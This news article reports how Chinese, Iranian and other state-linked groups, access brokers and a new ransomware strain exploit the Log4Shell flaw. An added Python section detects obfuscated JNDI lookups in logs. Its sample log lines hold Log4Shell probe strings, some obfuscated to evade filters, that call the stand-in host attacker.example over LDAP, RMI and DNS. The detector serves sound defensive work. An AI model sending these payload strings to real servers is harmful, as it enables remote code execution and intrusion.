Log4Shell used by nation-state hackers from China, Iran

As expected, nation-state hackers of all kinds have jumped at the opportunity to exploit the recently disclosed critical vulnerability (CVE-2021-44228) in the Apache Log4j Java-based logging library.

Also known as Log4Shell, the vulnerability is now being used by threat actors linked to governments in China, Iran, North Korea, and Turkey, as well as access brokers used by ransomware gangs.

All hackers switch to Log4Shell

Among the first threat actors to leverage Log4Shell to drop payloads were cryptocurrency mining groups and botnet operators, which began attacking immediately after proof-of-concept exploit code became publicly available.

In a report on Sunday, the Microsoft Threat Intelligence Center (MSTIC) observed the critical Log4j bug being exploited to drop Cobalt Strike beacons, which could indicate that more capable actors were at play, since that beacon is a common post-exploitation implant in hands-on network intrusions.

MSTIC updated the report on Tuesday to add that it had detected nation-state activity using Log4Shell, sometimes in active attacks. The researchers tracked “groups originating from China, Iran, North Korea, and Turkey.”

“This activity ranges from experimentation during development, integration of the vulnerability to in-the-wild payload deployment, and exploitation against targets to achieve the actor’s objectives.” - Microsoft Threat Intelligence Center

One of the actors is the Iranian threat group Phosphorus (also tracked as Charming Kitten or APT35), which Microsoft observed “acquiring and making modifications” to the Log4Shell exploit.

Unlike most APT groups operating these days, Charming Kitten has a history of ransomware attacks alongside its cyberespionage activity, with the ransomware used mainly to disrupt operations rather than to cash in.

Another nation-state threat actor taking advantage of the Log4Shell bug is Hafnium, a hacking group linked to China.

The adversary became more broadly known after exploiting the ProxyLogon zero-day vulnerabilities in Microsoft Exchange Server in the window between the bugs being reported and a patch becoming available.

Microsoft says that Hafnium is now using Log4Shell in attacks against virtualization infrastructure “to extend their typical targeting

According to the researchers, the systems Hafnium used in these attacks relied on a DNS service that is normally seen in testing activity to fingerprint target machines.

Cybersecurity firm Mandiant has confirmed that Chinese and Iranian state actors are using the Log4j vulnerability in attacks and expects other groups to be doing the same or to be in a preparation stage.

John Hultquist, VP of Intelligence Analysis at Mandiant, told BleepingComputer that adversaries will waste no time establishing persistence on targeted networks for follow-on activity.

“We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.” - John Hultquist

While the report from MSTIC also mentions state-backed hacking groups from North Korea and Turkey, the researchers did not offer any information on how these actors leveraged Log4Shell.

Ransomware attacks to be expected

Apart from nation-state actors, Microsoft has confirmed that brokers who sell initial network access to various groups, mostly financially motivated ones, have also started to exploit the Log4j flaw.

Initial access brokers typically work with ransomware-as-a-service (RaaS) operations, to which they sell access to compromised company networks.

“We have observed these groups attempting exploitation on both Linux and Windows systems, which may lead to an increase in human-operated ransomware impact on both of these operating system platforms” - Microsoft Threat Intelligence Center

Log4Shell has already been used in a ransomware attack from a new actor named Khonsari, a report from Bitdefender shows.

Based on available information, Khonsari may in practice be a wiper rather than ransomware: its ransom note lists contact details for a Louisiana antique shop owner instead of the attacker, leaving victims no way to pay for decryption.

It is no surprise that Log4Shell has attracted hackers of all sorts. The bug carries the maximum CVSS score of 10.0 and can be exploited remotely without authentication to take full control of a vulnerable system. Furthermore, the vulnerable Log4j library is bundled in products from dozens of vendors, many of which embed it without the customer knowing.
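The article does not show what an exploitation attempt looks like on the wire, so here is an added example that is not from the article, Microsoft, or Mandiant: a small Python detector that normalizes the common obfuscated forms of the Log4j `${jndi:...}` lookup string (`${lower:...}`, `${upper:...}`, and the `${...:-x}` default-value trick) before matching, then pulls out the lookup scheme and the callback host so the attacker's LDAP, RMI or DNS server can be hunted across other logs. The log lines below are constructed, and the host `attacker.example` is a placeholder, not an indicator from any report.

```python
import re

# Constructed sample access-log lines (not from the article). Lines 2-5 carry
# the shape of Log4Shell probes: a plain lookup, a ${lower:} obfuscated one,
# a ${::-x} default-value obfuscated one, and a nested ${env:...:-x} one.
# Line 6 is a benign-looking lookup that must NOT be flagged.
SAMPLE_LOGS = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.8 - - "GET /login HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.10 - - "GET / HTTP/1.1" 200 "${${env:NaN:-j}ndi:dns://attacker.example/d}"',
    '10.0.0.11 - - "GET / HTTP/1.1" 200 "${date:yyyy}"',
]

# Innermost lookups only (no braces inside), resolved repeatedly from the inside out.
_LOWER = re.compile(r"\$\{lower:([^{}]*)\}", re.I)
_UPPER = re.compile(r"\$\{upper:([^{}]*)\}", re.I)
# ${anything:-value} evaluates to "value" when the lookup is undefined, which
# is why "${::-j}" and "${env:NaN:-j}" both collapse to the letter "j".
_DEFAULT = re.compile(r"\$\{[^{}]*?:-([^{}]*)\}")
# After normalization: ${jndi:<scheme>://<host>...}; host is optional so that a
# lookup without "//" still counts as a hit.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://([^/:}\s]+))?", re.I)


def normalize(text, max_rounds=10):
    """Collapse nested lower/upper/default-value lookups until nothing changes.

    The round limit bounds work on adversarial input with deep nesting.
    """
    for _ in range(max_rounds):
        new = _LOWER.sub(lambda m: m.group(1).lower(), text)
        new = _UPPER.sub(lambda m: m.group(1).upper(), new)
        new = _DEFAULT.sub(lambda m: m.group(1), new)
        if new == text:
            return new
        text = new
    return text


def find_log4shell(line):
    """Return (scheme, host) for a JNDI lookup in the line, or None if absent."""
    m = _JNDI.search(normalize(line))
    if not m:
        return None
    host = m.group(2).lower() if m.group(2) else None
    return (m.group(1).lower(), host)


def scan(lines):
    """Scan log lines; return (line_no, scheme, host, normalized_line) per hit."""
    hits = []
    for n, line in enumerate(lines, 1):
        found = find_log4shell(line)
        if found:
            scheme, host = found
            hits.append((n, scheme, host, normalize(line)))
    return hits


if __name__ == "__main__":
    for n, scheme, host, norm in scan(SAMPLE_LOGS):
        print(f"line {n}: jndi via {scheme} to {host}: {norm}")
```

The normalization step matters more than the final regex: a naive search for the literal string `${jndi:` misses three of the four probes above, and the extracted host is the pivot for the follow-up question the Hafnium paragraph raises, namely which other machines resolved or connected to that callback server.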

Given the damage this bug can cause, the Cybersecurity and Infrastructure Security Agency (CISA) has ordered federal agencies to patch affected systems immediately.
